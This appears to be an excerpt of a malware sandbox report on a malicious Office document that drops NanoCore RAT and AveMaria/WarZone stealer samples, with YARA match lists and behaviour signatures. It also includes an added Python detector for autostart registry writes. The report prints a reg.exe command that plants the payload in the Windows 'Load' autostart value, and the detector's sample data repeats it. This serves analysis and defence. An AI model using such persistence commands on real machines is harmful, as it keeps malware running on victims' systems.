        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 4 | Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, ' I
        Source: Screenshot number: 12 | Screenshot OCR: Enable Editing when opening. ii: ^ f,if= a S
        .NET source code contains very large strings
        Source: putty[1].exe.0.dr, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: putty.exe.3.dr, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: putty.exe.6.dr, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: images.exe.13.dr, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 13.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 14.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Source: 14.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs | Long String: Length: 53649
        Found suspicious RTF objects
        Source: abdtfhgXgdghgh.ScT | Static RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT
        Microsoft Office creates scripting files
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
        Source: C:\ProgramData\images.exe | File created: C:\Windows\System32\rfxvmt.dll
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF60
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF4F
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A7A0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A790
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C8
        Source: C:\ProgramData\images.exeCode function: 17_2_004A0070
        Source: C:\ProgramData\images.exeCode function: 17_2_0118A5BD
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A50
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A40
        Source: C:\ProgramData\images.exeCode function: 17_2_003531F8
        Source: C:\ProgramData\images.exeCode function: 17_2_003531E8
        Source: C:\ProgramData\images.exeCode function: 21_3_042442D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04281AA0
        Source: C:\ProgramData\images.exeCode function: 21_3_04276B50
        Source: C:\ProgramData\images.exeCode function: 21_3_042404D0
        Source: C:\ProgramData\images.exeCode function: 21_3_042A25EC
        Source: C:\ProgramData\images.exeCode function: 21_3_042645D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04234660
        Source: C:\ProgramData\images.exeCode function: 21_3_042456B0
        Source: C:\ProgramData\images.exeCode function: 21_3_04248720
        Source: C:\ProgramData\images.exeCode function: 21_3_04249730
        Source: C:\ProgramData\images.exeCode function: 21_3_04246010
        Source: C:\ProgramData\images.exeCode function: 21_3_0427E170
        Source: C:\ProgramData\images.exeCode function: 21_3_042511E0
        Source: C:\ProgramData\images.exeCode function: 21_3_0429E32F
        Source: C:\ProgramData\images.exeCode function: 21_3_04242350
        Source: C:\Windows\System32\drvinst.exeProcess token adjusted: Load Driver
        Source: C:\ProgramData\images.exeCode function: String function: 042358A0 appears 70 times
        Source: C:\ProgramData\images.exeCode function: String function: 042362B0 appears 93 times
        Source: C:\ProgramData\images.exeCode function: String function: 04235680 appears 38 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 004036F7 appears 144 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 0040357C appears 62 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00411E88 appears 98 times
        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpdr.sys
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
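The reg.exe command above writes the dropped payload path into the Load value of HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, a legacy Winlogon autostart location that is missed by tooling that only watches the Run keys. The following detector is an added example, not part of the Joe Sandbox report: it takes process-creation command lines (PID, command line) such as Sysmon Event ID 1 would record, parses the reg add syntax, normalises hive aliases and HKU\<SID> paths, and flags writes to a small watch-list of autostart keys. The AUTOSTART_KEYS table and the SAMPLE_EVENTS lines are constructed for the example; the first sample line mirrors the command observed in this report.

```python
# Added example (not part of the sandbox report): flag reg.exe command lines that write
# to a known autostart location, such as the Load value under
# HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows used by this sample.
import re

# Lower-cased subkey -> value names to watch, or None to flag any value under the key.
# Assumption: this watch-list is illustrative, not a complete catalogue of autostart keys.
AUTOSTART_KEYS = {
    r"software\microsoft\windows nt\currentversion\windows": {"load", "run"},
    r"software\microsoft\windows nt\currentversion\winlogon": {"shell", "userinit"},
    r"software\microsoft\windows\currentversion\run": None,
    r"software\microsoft\windows\currentversion\runonce": None,
}

HIVES = {"hkcu": "hkcu", "hkey_current_user": "hkcu",
         "hklm": "hklm", "hkey_local_machine": "hklm",
         "hku": "hku", "hkey_users": "hku"}

# Double-quoted strings, single-quoted strings, or bare tokens. Sandbox reports (this
# one included) render the double quotes of the original command line as single quotes.
_TOKEN = re.compile(r"""\"([^"]*)\"|'([^']*)'|(\S+)""")


def split_cmdline(cmd):
    """Tokenise a Windows command line, keeping quoted paths that contain spaces intact."""
    return [a or b or c for a, b, c in _TOKEN.findall(cmd)]


def parse_reg_add(cmd):
    """Return the key and switches of a 'reg add' invocation, or None if cmd is not one."""
    toks = split_cmdline(cmd)
    low = [t.lower() for t in toks]
    for i, t in enumerate(low):
        if t in ("reg", "reg.exe") or t.endswith("\\reg.exe"):
            if low[i + 1:i + 2] == ["add"]:
                break
    else:
        return None
    if i + 2 >= len(toks):
        return None
    args = {"key": toks[i + 2], "value": None, "data": None, "force": False}
    j = i + 3
    while j < len(toks):
        t = low[j]
        if t == "/v" and j + 1 < len(toks):
            args["value"], j = toks[j + 1], j + 2
        elif t == "/d" and j + 1 < len(toks):
            args["data"], j = toks[j + 1], j + 2
        elif t == "/ve":                      # writes the key's (Default) value
            args["value"], j = "", j + 1
        elif t == "/f":
            args["force"], j = True, j + 1
        else:                                 # /t REG_SZ, /s, /reg:32 ...: not needed here
            j += 1
    return args


def normalize_key(key):
    """Map a registry path to (hive, lower-cased subkey); HKU\\<SID>\\... loses the SID."""
    hive, _, sub = key.replace("/", "\\").strip("\\").partition("\\")
    hive = HIVES.get(hive.lower())
    sub = sub.lower().strip("\\")
    if hive == "hku":                         # drop the SID so per-user keys match the list
        sub = sub.partition("\\")[2]
    return hive, sub


def classify(cmd):
    """Return a finding dict for a reg add that targets an autostart location, else None."""
    args = parse_reg_add(cmd)
    if args is None:
        return None
    hive, sub = normalize_key(args["key"])
    if hive is None or sub not in AUTOSTART_KEYS:
        return None
    watched = AUTOSTART_KEYS[sub]
    if watched is not None and (args["value"] or "").lower() not in watched:
        return None
    return {"hive": hive, "subkey": sub, "value": args["value"],
            "data": args["data"], "forced": args["force"]}


def scan(events):
    """events: iterable of (pid, command_line). Returns [(pid, finding)] for autostart writes."""
    return [(pid, f) for pid, cmd in events for f in [classify(cmd)] if f]


# Constructed sample telemetry: line one mirrors the reg.exe command in this report; the
# others cover the HKU\<SID> form, a non-autostart write and a read-only reg query.
SAMPLE_EVENTS = [
    (4321, "REG ADD 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows' /f /v Load /t REG_SZ /d 'C:\\ProgramData\\images.exe'"),
    (4322, 'C:\\Windows\\System32\\reg.exe add "HKEY_USERS\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v Updater /d "C:\\ProgramData\\upd.exe"'),
    (4323, "reg add HKLM\\SOFTWARE\\Example\\Settings /v Theme /d dark /f"),
    (4324, "reg query 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows'"),
]

if __name__ == "__main__":
    for pid, f in scan(SAMPLE_EVENTS):
        print(pid, f["hive"], f["subkey"], repr(f["value"]), "->", f["data"])
```

Pair this with an alert on the Load value itself (Sysmon Event ID 13 on the same key path) so that direct RegSetValue calls that bypass reg.exe, which is how most implants set the value, are caught as well; the command-line parser only covers the living-off-the-land variant shown in this report.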
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
